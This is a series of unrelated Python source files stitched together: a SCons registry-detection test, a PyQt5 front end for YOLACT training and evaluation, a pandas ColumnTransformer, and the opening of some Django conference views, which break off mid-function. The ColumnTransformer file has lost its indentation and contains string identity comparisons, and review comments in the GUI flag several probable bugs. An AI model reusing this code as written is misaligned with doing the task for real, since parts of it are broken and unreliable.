        '8.0Exp' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio 8\\', 'VCINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio 8\\VC\\'},
    }
    default_install_loc = install_locs['8.0Exp']
class msvsEmptyTestCase(msvsTestCase):
    """Test Empty Registry"""
    registry = DummyRegistry(regdata_none)
    default_version = '6.0'
    highest_version = None
    number_of_versions = 0
    install_locs = {
        '6.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio'},
        '7.0' : {},
        '7.1' : {},
        '8.0' : {},
        '8.0Exp' : {},
    }
    # NOTE(review): this uses install_locs['8.0Exp'] (an empty dict) even
    # though default_version is '6.0'; presumably "no install dirs" is the
    # expected answer for an empty registry — confirm against the detection
    # code before "fixing" it to install_locs['6.0'].
    default_install_loc = install_locs['8.0Exp']
if __name__ == "__main__":
    # only makes sense to test this on win32
    if sys.platform != 'win32':
        sys.exit(0)
    # Route SCons.Util's registry and filesystem probes through the dummies
    # so the detection code reads our fake registry instead of the real one.
    SCons.Util.RegOpenKeyEx = DummyOpenKeyEx
    SCons.Util.RegEnumKey = DummyEnumKey
    SCons.Util.RegEnumValue = DummyEnumValue
    SCons.Util.RegQueryValueEx = DummyQueryValue
    os.path.exists = DummyExists # make sure all files exist :-)
    exit_val = 0
    test_classes = [
        msvs6aTestCase,
        msvs6bTestCase,
        msvs6and7TestCase,
        msvs7TestCase,
        msvs71TestCase,
        msvs8ExpTestCase,
        msvsEmptyTestCase,
    ]
    for test_class in test_classes:
        # Parenthesized so the line is valid on both Python 2 and Python 3
        # (the bare 'print x' statement form is Python-2-only).
        print(test_class.__doc__)
        suite = unittest.makeSuite(test_class, 'test_')
        if not unittest.TextTestRunner().run(suite).wasSuccessful():
            exit_val = 1
    sys.exit(exit_val)
|
import sys
import gui
from PyQt5 import QtWidgets, QtGui, QtCore
from PyQt5.QtGui import QPixmap, QImage, QDoubleValidator, QIntValidator
from PyQt5.QtWidgets import QApplication, QDialog
from PyQt5.QtCore import QThread, pyqtSignal, QEventLoop, QTimer
import os
import time
import eval as eval_script
import train as train_script
class MainDialog(QDialog):
    """Main window for the YOLACT GUI.

    Wires the Qt widgets to background threads for training, benchmarking,
    evaluation and online (video/webcam) testing, and redirects stdout into
    the in-window terminal via the threads' write() hooks.
    """
    def __init__(self, parent=None):
        # NOTE(review): super(QDialog, self) starts the MRO search *after*
        # QDialog, so QDialog.__init__ itself is skipped — confirm this is
        # intentional (the conventional call is super(MainDialog, self)).
        super(QDialog, self).__init__(parent)
        self.ui = gui.Ui_Dialog()
        self.ui.setupUi(self)
        flag = QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowMinMaxButtonsHint | QtCore.Qt.WindowCloseButtonHint
        self.setWindowFlags(flag)
        self.setWindowState(QtCore.Qt.WindowMinimized)
        self.setWindowTitle('YOLACT - GUI')
        # Selected file/model paths; the empty string means "nothing chosen yet".
        self.validationFile = str()
        self.validationModel = str()
        self.onlineFile = str()
        self.onlineModel = str()
        self.benchmarkModel = str()
        # Defaults for the training / evaluation / benchmark controls.
        self.trainConfig = 'yolact_base_config'
        self.batchSize = '1'
        self.validationScoreThreshold = 0.15
        self.benchmarkNumImage = 1000
        # Action buttons stay disabled until their required inputs are chosen.
        self.ui.pushButton_evaluate.setEnabled(False)
        self.ui.pushButton_benchmark.setEnabled(False)
        self.ui.radioButton_batchEvaluation.setChecked(False)
        self.ui.pushButton_onlineTest.setEnabled(False)
        float_validator = QDoubleValidator(float("-inf"), float("inf"), 2, self)
        self.ui.lineEdit_scoreThreshold.setValidator(float_validator)
        self.ui.lineEdit_onlineThreshold.setValidator(float_validator)
        int_validator = QIntValidator(1, 10000, self)
        self.ui.lineEdit_numImage.setValidator(int_validator)
        int_validator = QIntValidator(0, 99, self)
        self.ui.lineEdit_camIndex.setValidator(int_validator)
        # Training
        self.t = TrainingThread()
        self.t.signalForText.connect(self.updateTextBrowser)
        self.ui.pushButton_train.clicked.connect(self.triggerTraining)
        sys.stdout = self.t
        self.ui.lineEdit_batchSize.editingFinished.connect(self.updateBatchSize)
        self.ui.lineEdit_batchSize.setValidator(int_validator)
        self.ui.lineEdit_trainConfig.editingFinished.connect(self.updateTrainConfig)
        # Benchmark
        self.b = BenchmarkThread()
        self.b.signalForText.connect(self.updateTextBrowser)
        self.ui.pushButton_benchmark.clicked.connect(self.triggerBenchmark)
        self.ui.pushButton_selectModel_2.clicked.connect(self.chooseBenchmarkModel)
        sys.stdout = self.b
        self.ui.lineEdit_numImage.editingFinished.connect(self.lineEditMoveSliderBenchmark)
        self.ui.horizontalSlider_numImage.valueChanged.connect(self.sliderEditLineEditBenchmark)
        # Evaluation
        # NOTE(review): a BenchmarkThread (not an EvaluationThread) is created
        # here, and since sys.stdout is reassigned three times in a row only
        # this last assignment actually captures stdout — confirm intended.
        self.e = BenchmarkThread()
        self.e.signalForText.connect(self.updateTextBrowser)
        sys.stdout = self.e
        self.ui.pushButton_selectImage.clicked.connect(self.chooseValidateFile)
        self.ui.pushButton_selectModel.clicked.connect(self.chooseTrainedModel)
        self.ui.pushButton_evaluate.clicked.connect(self.triggerEvaluation)
        self.ui.lineEdit_scoreThreshold.editingFinished.connect(self.lineEditMoveSlider)
        self.ui.horizontalSlider_scoreThreshold.valueChanged.connect(self.sliderEditLineEdit)
        # Online Test
        self.d = DisplayThread()
        self.d.signalForDisplay.connect(self.displayImage)
        self.ui.pushButton_onlineTest.clicked.connect(self.triggerOnlineTest)
        self.ui.pushButton_onlineModel.clicked.connect(self.chooseOnlineModel)
        self.ui.pushButton_onlineVideo.clicked.connect(self.chooseOnlineFile)
        self.ui.lineEdit_onlineThreshold.editingFinished.connect(self.onlineThresholdLimit)
        # Clear
        self.ui.pushButton_reset.clicked.connect(self.resetWindow)
        self.ui.pushButton_clearTerminal.clicked.connect(self.clearTerminal)
        self.ui.pushButton_terminateThread.clicked.connect(self.terminateThread)
        self.clearWindow()
    def displayImage(self):
        """Load results/tmp_res.jpg, scale it to the display widget, and show it."""
        curr_path = os.getcwd()
        res_path = curr_path + '/results/tmp_res.jpg'
        width = self.ui.display.width()
        height = self.ui.display.height()
        img = QImage(res_path)
        # Scaling the QPixmap directly did not work (reason unknown), so the
        # QImage is scaled first and then converted.
        pixmap = QPixmap.fromImage(img.scaled(width, height, QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation))
        self.ui.display.setPixmap(pixmap)
    def terminateThread(self):
        """Hard-stop every worker thread and reset the window."""
        self.b.terminate()
        self.t.terminate()
        self.e.terminate()
        self.d.terminate()
        self.clearWindow()
    def updateTextBrowser(self, text):
        """Append captured stdout text to the terminal view and keep it scrolled."""
        cursor = self.ui.textBrowser_terminal.textCursor()
        cursor.movePosition(QtGui.QTextCursor.End)
        cursor.insertText(text)
        self.ui.textBrowser_terminal.setTextCursor(cursor)
        self.ui.textBrowser_terminal.ensureCursorVisible()
    def updateBatchSize(self):
        """Cache the batch-size line edit (normalized through int) as a string."""
        num = self.ui.lineEdit_batchSize.text()
        num = int(num)
        self.batchSize = str(num)
    def updateTrainConfig(self):
        """Cache the training-config line edit."""
        self.trainConfig = self.ui.lineEdit_trainConfig.text()
    def triggerTraining(self):
        """Start training in a background thread.

        Equivalent CLI:
        python train.py --config=yolact_base_config --batch_size=1
        """
        config = self.trainConfig
        batch_size = self.batchSize
        self.t = TrainingThread(config, batch_size)
        self.t.start()
        # Brief local event loop so the GUI stays responsive while the
        # thread spins up.
        loop = QEventLoop()
        QTimer.singleShot(2000, loop.quit)
        loop.exec_()
    def triggerBenchmark(self):
        """Start a benchmark run in a background thread."""
        # print(self.benchmarkModel)
        self.ui.pushButton_benchmark.setEnabled(False)
        self.b = BenchmarkThread(self.benchmarkModel, self.benchmarkNumImage)
        self.b.start()
        # NOTE(review): unlike triggerTraining, loop.exec_() is never called
        # here, so this QEventLoop/QTimer pair has no effect — confirm.
        loop = QEventLoop()
        QTimer.singleShot(2000, loop.quit)
    def triggerEvaluation(self):
        """Run single-image evaluation inline, or batch evaluation in a thread."""
        image = self.validationFile
        model = self.validationModel
        score_threshold = self.validationScoreThreshold
        # Setup Evaluation
        if not self.ui.radioButton_batchEvaluation.isChecked():
            # Single image: run synchronously and display the result.
            eval_script.parse_args(['--trained_model=' + model, '--score_threshold=' + str(score_threshold),
                                    '--top_k=20', '--image=' + image + ':results/tmp_res.jpg'])
            eval_script.perform()
            self.displayImage()
            return
        eval_script.parse_args(['--trained_model=' + model])
        self.e = EvaluationThread()
        self.e.start()
        self.ui.pushButton_terminateThread.setEnabled(True)
        # NOTE(review): loop.exec_() is never called — confirm.
        loop = QEventLoop()
        QTimer.singleShot(2000, loop.quit)
    def chooseTrainedModel(self, FilePath):
        """Pick the .pth model used for evaluation."""
        model = QtWidgets.QFileDialog.getOpenFileName(self, "Select your model", "./weights")[0]
        if model == '':
            # NOTE(review): this cancel branch resets the *online-test*
            # widgets (copy-paste from chooseOnlineModel?); the evaluation
            # pair pushButton_selectModel / pushButton_evaluate looks like
            # the intended target — confirm.
            self.ui.pushButton_onlineModel.setText('Select model')
            self.ui.pushButton_onlineTest.setEnabled(False)
            return
        # Strip everything up to and including the 'yolact-gui/' project prefix.
        pos = model.find('yolact-gui')
        model = model[pos + 11:]
        # Walk backwards to the last '/', so model[pos:] is the basename.
        pos = len(model)
        for ch in model[::-1]:
            if ch == '/':
                break
            pos = pos - 1
        # Collect the reversed extension; 'htp' is '.pth' read backwards.
        post = str()
        for ch in model[::-1]:
            if ch == '.':
                break
            post += ch
        if post != 'htp':
            self.ui.display.setText('Selected file is not valid model file (.pth)!')
            self.ui.pushButton_onlineTest.setEnabled(False)
            return
        self.ui.pushButton_selectModel.setText(model[pos:])
        self.validationModel = model
        if self.validationModel != '' and self.validationFile != '':
            # NOTE(review): enables the online-test button; the surrounding
            # evaluation logic suggests pushButton_evaluate was meant — confirm.
            self.ui.pushButton_onlineTest.setEnabled(True)
    def chooseOnlineModel(self, FilePath):
        """Pick the .pth model used for online (video/webcam) testing."""
        model = QtWidgets.QFileDialog.getOpenFileName(self, "Select your model", "./weights")[0]
        if model == '':
            self.ui.pushButton_onlineModel.setText('Select model')
            self.ui.pushButton_onlineTest.setEnabled(False)
            return
        # Strip the project prefix, then locate basename and reversed extension
        # (same scheme as chooseTrainedModel).
        pos = model.find('yolact-gui')
        model = model[pos + 11:]
        pos = len(model)
        for ch in model[::-1]:
            if ch == '/':
                break
            pos = pos - 1
        post = str()
        for ch in model[::-1]:
            if ch == '.':
                break
            post += ch
        if post != 'htp':
            self.ui.display.setText('Selected file is not valid model file (.pth)!')
            self.ui.pushButton_onlineModel.setEnabled(False)
            return
        self.ui.pushButton_onlineModel.setText(model[pos:])
        self.onlineModel = model
        if self.onlineModel != '' and self.onlineFile != '':
            self.ui.pushButton_onlineTest.setEnabled(True)
    def chooseOnlineFile(self):
        """Pick the .mp4 video used for online testing."""
        video = QtWidgets.QFileDialog.getOpenFileName(self, "Select your video", "./video")[0]
        if video == '':
            self.ui.pushButton_onlineVideo.setText('Select video')
            self.ui.pushButton_onlineTest.setEnabled(False)
            return
        pos = video.find('yolact-gui')
        video = video[pos + 11:]
        pos = len(video)
        for ch in video[::-1]:
            if ch == '/':
                break
            pos = pos - 1
        # '4pm' is '.mp4' read backwards.
        post = str()
        for ch in video[::-1]:
            if ch == '.':
                break
            post += ch
        if post != '4pm':
            self.ui.display.setText('Selected file is not a valid video (.mp4)!')
            self.ui.pushButton_onlineTest.setEnabled(False)
            return
        self.ui.pushButton_onlineVideo.setText(video[pos:])
        self.onlineFile = video
        if self.onlineModel != '' and self.onlineFile != '':
            self.ui.pushButton_onlineTest.setEnabled(True)
    def chooseBenchmarkModel(self, FilePath):
        """Pick the .pth model used for benchmarking."""
        model = QtWidgets.QFileDialog.getOpenFileName(self, "Select your model", "./weights")[0]
        if model == '':
            self.ui.pushButton_selectModel_2.setText('Select model')
            self.ui.pushButton_benchmark.setEnabled(False)
            return
        pos = model.find('yolact-gui')
        model = model[pos + 11:]
        pos = len(model)
        for ch in model[::-1]:
            if ch == '/':
                break
            pos = pos - 1
        post = str()
        for ch in model[::-1]:
            if ch == '.':
                break
            post += ch
        if post != 'htp':
            self.ui.display.setText('Selected file is not a valid model file (.pth)!')
            self.ui.pushButton_benchmark.setEnabled(False)
            return
        self.ui.pushButton_selectModel_2.setText(model[pos:])
        self.benchmarkModel = model
        if self.benchmarkModel != '':
            self.ui.pushButton_benchmark.setEnabled(True)
    def chooseValidateFile(self, FilePath):
        """Pick the .jpg/.png image used for single-image evaluation."""
        image = QtWidgets.QFileDialog.getOpenFileName(self, "Select your image", "./img")[0]
        if image == '':
            self.ui.pushButton_selectImage.setText('Select image')
            self.ui.pushButton_evaluate.setEnabled(False)
            return
        pos = image.find('yolact-gui')
        image = image[pos + 11:]
        pos = len(image)
        for ch in image[::-1]:
            if ch == '/':
                break
            pos = pos - 1
        # 'gpj' / 'gnp' are '.jpg' / '.png' read backwards.
        post = str()
        for ch in image[::-1]:
            if ch == '.':
                break
            post += ch
        if post != 'gpj' and post != 'gnp':
            self.ui.display.setText('Selected file is not a valid image (.jpg or .png)!')
            self.ui.pushButton_evaluate.setEnabled(False)
            return
        self.ui.pushButton_selectImage.setText(image[pos:])
        self.validationFile = image
        if self.validationModel != '' and self.validationFile != '':
            self.ui.pushButton_evaluate.setEnabled(True)
    def triggerOnlineTest(self):
        '''
        python eval.py --trained_model=weights/yolact_base_54_800000.pth --score_threshold=0.25 --top_k=15 --video_multiframe=4 --video=video/demo.mp4
        '''
        model = self.onlineModel
        score_threshold = self.ui.lineEdit_onlineThreshold.text()
        video_multiframe = 4
        video = self.onlineFile # :results/tmp_video.mp4
        if self.ui.radioButton_webcam.isChecked():
            # Webcam index is passed through the --video argument.
            webcam = self.ui.lineEdit_camIndex.text()
            eval_script.parse_args(['--trained_model=' + model, '--score_threshold=' + score_threshold,
                                    '--top_k=15', '--video_multiframe=' + str(video_multiframe), '--video=' + webcam])
        else:
            eval_script.parse_args(['--trained_model=' + model, '--score_threshold=' + score_threshold,
                                    '--top_k=15', '--video_multiframe=' + str(video_multiframe), '--video=' + video])
        self.e = EvaluationThread()
        self.e.start()
        self.d.start()
        self.ui.pushButton_terminateThread.setEnabled(True)
        # NOTE(review): loop.exec_() is never called — confirm.
        loop = QEventLoop()
        QTimer.singleShot(2000, loop.quit)
    def resetWindow(self):
        """Clear the terminal, then restore all controls to their defaults."""
        self.ui.textBrowser_terminal.clear()
        self.clearWindow()
    def clearWindow(self):
        """Restore every control and cached setting to its initial state."""
        self.ui.display.clear()
        self.validationFile = str()
        self.validationModel = str()
        self.onlineFile = str()
        self.onlineModel = str()
        self.validationModel = str()  # NOTE(review): duplicate of the reset above
        self.benchmarkModel = str()
        self.ui.pushButton_selectModel.setText('Select model')
        self.ui.pushButton_selectImage.setText('Select image')
        self.ui.pushButton_onlineVideo.setText('Select video')
        self.ui.pushButton_onlineModel.setText('Select model')
        self.ui.pushButton_evaluate.setEnabled(False)
        self.ui.pushButton_onlineTest.setEnabled(False)
        self.ui.horizontalSlider_scoreThreshold.setValue(15)
        self.ui.lineEdit_scoreThreshold.setText('0.15')
        self.ui.lineEdit_onlineThreshold.setText('0.15')
        self.ui.lineEdit_camIndex.setText('0')
        self.ui.radioButton_batchEvaluation.setChecked(False)
        self.ui.pushButton_selectModel_2.setText('Select model')
        self.benchmarkNumImage = 1000
        self.ui.pushButton_benchmark.setEnabled(False)
        self.ui.lineEdit_numImage.setText('1000')
        self.ui.horizontalSlider_numImage.setValue(1000)
        self.trainConfig = 'yolact_base_config'
        self.batchSize = '1'
        self.ui.lineEdit_batchSize.setText('1')
        self.ui.lineEdit_trainConfig.setText('yolact_base_config')
        # delete tmp result
        curr_path = os.getcwd()
        delete_file = curr_path + '/results/tmp_res.jpg'
        if os.path.exists(delete_file):
            os.remove(delete_file)
    def clearTerminal(self):
        """Clear only the terminal view."""
        self.ui.textBrowser_terminal.clear()
    def lineEditMoveSlider(self):
        """Clamp the typed score threshold to [0, 0.99] and sync the slider."""
        value = self.ui.lineEdit_scoreThreshold.text()
        value = float(value)
        if value < 0:
            value = 0
        if value > 0.99:
            value = 0.99
        value = format(value, '.2f')
        self.ui.lineEdit_scoreThreshold.setText(value)
        # Slider works in integer hundredths of the threshold.
        self.ui.horizontalSlider_scoreThreshold.setValue(float(value) * 100)
        self.validationScoreThreshold = float(value)
    def lineEditMoveSliderBenchmark(self):
        """Clamp the typed image count to [100, 10000] and sync the slider."""
        value = self.ui.lineEdit_numImage.text()
        value = int(value)
        if value < 100:
            value = 100
        if value > 10000:
            value = 10000
        self.ui.lineEdit_numImage.setText(str(value))
        self.ui.horizontalSlider_numImage.setValue(value)
        self.benchmarkNumImage = int(value)
    def sliderEditLineEdit(self):
        """Mirror the score-threshold slider (hundredths) into the line edit."""
        value = self.ui.horizontalSlider_scoreThreshold.value() / 100
        self.validationScoreThreshold = value
        value = format(value, '.2f')
        self.ui.lineEdit_scoreThreshold.setText(value)
    def sliderEditLineEditBenchmark(self):
        """Mirror the image-count slider into the line edit."""
        value = self.ui.horizontalSlider_numImage.value()
        self.benchmarkNumImage = value
        self.ui.lineEdit_numImage.setText(str(value))
    def onlineThresholdLimit(self):
        """Round the online threshold to two decimals and clamp to [0, 0.99]."""
        value = self.ui.lineEdit_onlineThreshold.text()
        value = float(value)
        value = format(value, '.2f')
        value = float(value)
        if value < 0:
            value = 0
        if value > 0.99:
            value = 0.99
        self.ui.lineEdit_onlineThreshold.setText(str(value))
class TrainingThread(QThread):
    """Background worker that runs train.py.

    Its write() hook makes it usable as a sys.stdout replacement, so
    anything printed during training is forwarded to the GUI terminal.
    """
    signalForText = pyqtSignal(str)
    def __init__(self, config=None, batch_size=None, data=None, parent=None):
        super(TrainingThread, self).__init__(parent)
        self.data = data
        self.config = config
        self.batch_size = batch_size
    def write(self, text):
        # File-like hook: forward captured stdout to the GUI terminal.
        self.signalForText.emit(str(text))
    def run(self):
        cli_args = ['--config=' + self.config, '--batch_size=' + self.batch_size]
        train_script.parse_args(cli_args)
        train_script.perform()
class BenchmarkThread(QThread):
    """Background worker that benchmarks a trained model over *num* images.

    Its write() hook makes it usable as a sys.stdout replacement, so
    anything printed during the run is forwarded to the GUI terminal.
    """
    signalForText = pyqtSignal(str)
    def __init__(self, model=None, num=1000, data=None, parent=None):
        super(BenchmarkThread, self).__init__(parent)
        self.data = data
        self.model = model
        self.num = num
    def write(self, text):
        # File-like hook: forward captured stdout to the GUI terminal.
        self.signalForText.emit(str(text))
    def run(self):
        cli_args = ['--trained_model=' + self.model, '--benchmark', '--max_images=' + str(self.num)]
        eval_script.parse_args(cli_args)
        eval_script.perform()
class EvaluationThread(QThread):
    """Background worker that runs eval.py with previously parsed arguments.

    Its write() hook makes it usable as a sys.stdout replacement, so
    anything printed during evaluation is forwarded to the GUI terminal.
    """
    signalForText = pyqtSignal(str)
    def __init__(self, data=None, parent=None):
        super(EvaluationThread, self).__init__(parent)
        self.data = data
    def write(self, text):
        # File-like hook: forward captured stdout to the GUI terminal.
        self.signalForText.emit(str(text))
    def run(self):
        # NOTE(review): when args.video is None, perform() executes twice in
        # a row — a missing `return` (or `else`) looks likely; confirm intent.
        if eval_script.args.video is None:
            eval_script.perform()
        eval_script.perform()
class DisplayThread(QThread):
    """Emits a refresh signal roughly three times a second so the GUI
    redraws the latest result frame during online testing."""
    signalForDisplay = pyqtSignal(str)
    def __init__(self, parent=None):
        # Fixes the original misspelling '__int__', which meant this
        # initializer was never actually invoked by Python (QThread's
        # default __init__ ran instead).
        super(DisplayThread, self).__init__(parent)
    def run(self):
        while True:
            self.signalForDisplay.emit('')
            time.sleep(0.33)
if __name__ == '__main__':
    # Launch the Qt event loop with the main dialog on screen.
    app = QApplication(sys.argv)
    dialog = MainDialog()
    dialog.show()
    sys.exit(app.exec_())
<filename>pipeline/_column_transformer.py
import pandas as pd
import numpy as np
from sklearn.utils.metaestimators import _BaseComposition
from sklearn.base import TransformerMixin, clone
from sklearn.pipeline import _name_estimators
from ..preprocessing import Identity, ColumnSelector
__all__ = ['ColumnTransformer', 'make_column_transformer']
class ColumnTransformer(_BaseComposition, TransformerMixin):
'''Applies transformers to columns of an array or pandas DataFrame.
This estimator allows different columns or column subsets of the input
to be transformed separately and the features generated by each transformer
will be concatenated to form a single feature space. This is useful for
combining several feature extraction mechanisms or transformations
into a single transformer.
Parameters
----------
transformer_list : list
List of (string, transformer, columns) tuples (implementing fit/transform).
remainder : {'drop', 'pass'} or estimator, default 'drop'
By default, only the specified columns in `transformer_list` are
transformed and combined in the output, and the non-specified
columns are dropped. (default of ``'drop'``).
By specifying ``remainder='pass'``, all remaining columns that
were not specified in `transformer_list` will be automatically passed
through. This subset of columns is concatenated with the output of
the transformers.
By setting ``remainder`` to be an estimator, the remaining
non-specified columns will use the ``remainder`` estimator. The
estimator must support `fit` and `transform`.
Attributes
----------
transformers_ : list
The collection of fitted transformers as tuples of (name, fitted_transformer,
column). fitted_transformer can be an estimator, ‘drop’, or ‘pass’.
In case there were no columns selected, this will be the unfitted transformer.
If there are remaining columns, the final element is a tuple of the form:
(‘remainder’, transformer, remaining_columns_) corresponding to the remainder
parameter. If there are remaining columns, then
len(transformers_)==len(transformers)+1, otherwise
len(transformers_)==len(transformers).
named_transformers_ : Bunch object, a dictionary with attribute access
Access the fitted transformer by name.
remaining_columns_ : list of strings
List of remining columns.
'''
def __init__(self, transformer_list, remainder='drop', **kwargs):
self.transformer_list = transformer_list
self.remainder = remainder
@property
def _transformers(self):
"""
Internal list of transformer only containing the name and
transformers, dropping the columns. This is for the implementation
of get_params via BaseComposition._get_params which expects lists
of tuples of len 2.
"""
return [(name, trans) for name, trans, _ in self.transformer_list]
def fit(self, X, y=None):
"""Fit all transformers using X.
Parameters
----------
X : DataFrame of shape [n_samples, n_features]
Input data, of which specified subsets are used to fit the transformers.
y : array-like, shape (n_samples, ...), optional
Targets for supervised learning.
Returns
-------
self : ColumnTransformer
This estimator
"""
self.transformers_ = []
self.named_transformers_ = {}
self.remaining_columns_ = set(X.columns)
for name, transformer, cols in self.transformer_list:
# Clone & fit
fitted_transformer = clone(transformer).fit(X[cols], y)
self.named_transformers_[name] = fitted_transformer
# Access by key
fitted_tuple = (name, fitted_transformer, cols)
self.transformers_.append(fitted_tuple)
# Remainin columns
self.remaining_columns_ -= set(cols)
self.remaining_columns_ = list(self.remaining_columns_)
if self.remaining_columns_:
name, cols = 'remainder', self.remaining_columns_
if hasattr(self.remainder, 'fit') and hasattr(self.remainder, 'transform'):
fitted_transformer = clone(self.remainder).fit(X[cols], y)
elif self.remainder is 'pass':
fitted_transformer = Identity().fit(X[cols], y)
elif self.remainder is 'drop':
fitted_transformer = ColumnSelector(cols=[]).fit(X[cols], y)
else:
raise ValueError('Unknown type for remainder. Must be "drop", "pass" or estimator.')
fitted_tuple = (name, fitted_transformer, cols)
self.transformers_.append(fitted_tuple)
return self
def transform(self, X):
    """Apply each fitted transformer to its columns and concatenate.

    Parameters
    ----------
    X : DataFrame of shape [n_samples, n_features]
        Input data; every fitted transformer receives its own column
        subset.

    Returns
    -------
    Xt : DataFrame, shape (n_samples, sum_n_components)
        Horizontal concatenation of all transformer outputs.
    """
    parts = [trans.transform(X[cols]) for _name, trans, cols in self.transformers_]
    return pd.concat(parts, axis=1)
def get_params(self, deep=True):
    """Get parameters for this estimator.

    Parameters
    ----------
    deep : boolean, optional
        If True, also include the parameters of nested estimators.

    Returns
    -------
    params : mapping of string to any
        Parameter names mapped to their values.
    """
    # Delegate to BaseComposition._get_params through the 2-tuple view.
    params = self._get_params('_transformers', deep=deep)
    return params
def set_params(self, **kwargs):
    """Set the parameters of this estimator.

    Valid parameter keys can be listed with ``get_params()``.

    Returns
    -------
    self
    """
    # Delegate to BaseComposition._set_params through the 2-tuple view.
    self._set_params('_transformers', **kwargs)
    return self
def _get_transformer_list(estimators):
    """Construct (name, trans, column) tuples from (transformer, columns) pairs.

    Names are generated automatically from the transformer types by
    ``_name_estimators``.
    """
    # NOTE: a dead local (`message`, an error string that was never raised)
    # was removed here; the input format is documented in
    # `make_column_transformer` instead.
    transformers, columns = zip(*estimators)
    names, _ = zip(*_name_estimators(transformers))
    transformer_list = list(zip(names, transformers, columns))
    return transformer_list
def make_column_transformer(*transformers, **kwargs):
    """Construct a ColumnTransformer from the given transformers.

    Shorthand for the ColumnTransformer constructor: transformers are not
    (and cannot be) named explicitly — names are derived from their types.
    ``transformer_weights`` is not supported.

    Parameters
    ----------
    *transformers : tuples of transformers and column selections
    remainder : {'drop', 'pass'} or estimator, default 'drop'
        Policy for the columns not listed in `transformers`: drop them,
        pass them through unchanged, or transform them with the given
        estimator (which must support `fit` and `transform`).
    sparse_threshold : float, default = 0.3
        Density below which a mixed sparse/dense output is stacked as a
        sparse matrix; ignored when the output is uniformly sparse or
        dense. Use ``sparse_threshold=0`` to always return dense.
    n_jobs : int or None, optional (default=None)
        Number of parallel jobs (``None`` means 1 unless inside a
        :obj:`joblib.parallel_backend` context; ``-1`` uses all
        processors — see :term:`Glossary <n_jobs>`).

    Returns
    -------
    ct : ColumnTransformer
    """
    # transformer_weights is deliberately not accepted: the caller would
    # need to know the automatically generated transformer names.
    remainder = kwargs.pop('remainder', 'drop')
    sparse_threshold = kwargs.pop('sparse_threshold', 0.3)
    n_jobs = kwargs.pop('n_jobs', None)
    if kwargs:
        unexpected = list(kwargs.keys())[0]
        raise TypeError('Unknown keyword arguments: "{}"'.format(unexpected))
    transformer_list = _get_transformer_list(transformers)
    return ColumnTransformer(transformer_list, n_jobs=n_jobs,
                             remainder=remainder,
                             sparse_threshold=sparse_threshold)
|
from django.core.mail import send_mail
from django.shortcuts import get_object_or_404, redirect, render
from django.template.loader import render_to_string
from django.urls import reverse, reverse_lazy
from django.utils.translation import ugettext_lazy as _
from django.views.generic import DeleteView, FormView, TemplateView
from django.contrib import messages
from django.db.models import Q, Count, Sum
from django.views.generic import CreateView, DetailView, ListView, UpdateView
from django.http import HttpResponse, Http404, HttpResponseServerError
from django.utils import timezone
from django.core.exceptions import PermissionDenied
from django.core.mail import send_mail
from django.forms import modelform_factory
from django import forms
from django.views.decorators.http import require_http_methods
from django.core.cache import cache
from django_select2.views import AutoResponseView
from functools import reduce
import csv
from mailing.forms import MessageForm
from mailing.utils import send_message
from .planning import Program
from .decorators import speaker_required, volunteer_required, staff_required
from .mixins import StaffRequiredMixin, OnSiteMixin, OnSiteFormMixin
from .utils import is_staff
from .models import Participant, Talk, TalkCategory, Vote, Track, Tag, Room, Volunteer, Activity
from .emails import talk_email_send, talk_email_render_preview, \
speaker_email_send, speaker_email_render_preview, \
volunteer_email_send, volunteer_email_render_preview
from .forms import TalkForm, TalkStaffForm, TalkFilterForm, get_talk_speaker_form_class, \
TalkActionForm, SpeakerActionForm, VolunteerActionForm, \
ParticipantForm, ParticipantFilterForm, NotifyForm, \
ConferenceForm, HomepageForm, CreateUserForm, TrackForm, RoomForm, \
VolunteerForm, VolunteerFilterForm, EmailForm, \
PreviewTalkMailForm, PreviewSpeakerMailForm, PreviewVolunteerMailForm, \
SendTalkMailForm, SendSpeakerMailForm, SendVolunteerMailForm, \
TagForm, TalkCategoryForm, ActivityForm, \
ACCEPTATION_VALUES, CONFIRMATION_VALUES
def home(request):
    """Render the conference homepage, or fall back to the proposal page."""
    if not request.conference.home:
        return redirect(reverse('proposal-home'))
    return render(request, 'cfp/home.html')
def volunteer_enrole(request):
    """Public enrolment form for conference volunteers.

    Volunteers already known by e-mail are redirected to their dashboard.
    Otherwise a VolunteerForm is shown, pre-filled from the authenticated
    user's profile when available; on success a thank-you message with the
    volunteer's secret dashboard URL is sent to his/her conversation.
    """
    # Already enrolled? Go straight to the dashboard.
    if request.user.is_authenticated and Volunteer.objects.filter(site=request.conference.site, email=request.user.email).exists():
        return redirect(reverse('volunteer-dashboard'))
    if not request.conference.volunteers_enrollment_is_open():
        raise PermissionDenied
    initial = {}
    # Pre-fill from the user profile on the initial GET only.
    if request.user.is_authenticated and not request.POST:
        initial.update({
            'name': request.user.get_full_name(),
            'phone_number': request.user.profile.phone_number,
            'sms_prefered': request.user.profile.sms_prefered,
        })
    form = VolunteerForm(request.POST or None, initial=initial, conference=request.conference)
    if request.user.is_authenticated:
        # Authenticated users keep their account e-mail; hide the field.
        form.fields.pop('email')
    if request.method == 'POST' and form.is_valid():
        volunteer = form.save(commit=False)
        volunteer.language = request.LANGUAGE_CODE
        if request.user.is_authenticated:
            volunteer.email = request.user.email
        volunteer.save()
        form.save_m2m()
        body = _("""Hi {},
Thank your for your help in the organization of the conference {}!
You can update your availability at anytime:
{}
Thanks!
{}
""").format(volunteer.name, request.conference.name, volunteer.get_secret_url(full=True), request.conference.name)
        send_message(
            thread=volunteer.conversation,
            author=request.conference,
            subject=_('[%(conference)s] Thank you for your help!') % {'conference': request.conference},
            content=body,
        )
        messages.success(request, _('Thank you for your participation! You can now subscribe to some activities.'))
        return redirect(reverse('volunteer-dashboard', kwargs={'volunteer_token': volunteer.token}))
    return render(request, 'cfp/volunteer_enrole.html', {
        'activities': Activity.objects.filter(site=request.conference.site),
        'form': form,
    })
def volunteer_mail_token(request):
    """Send a volunteer a fresh link to his/her token-protected dashboard.

    The volunteer is looked up by e-mail on the current conference site;
    unknown addresses get an error message instead of a mail.
    """
    form = EmailForm(request.POST or None)
    if request.method == 'POST' and form.is_valid():
        try:
            volunteer = Volunteer.objects.get(site=request.conference.site, email=form.cleaned_data['email'])
        except Volunteer.DoesNotExist:
            messages.error(request, _('Sorry, we do not know this email.'))
        else:
            # Build the absolute secret URL for the volunteer dashboard.
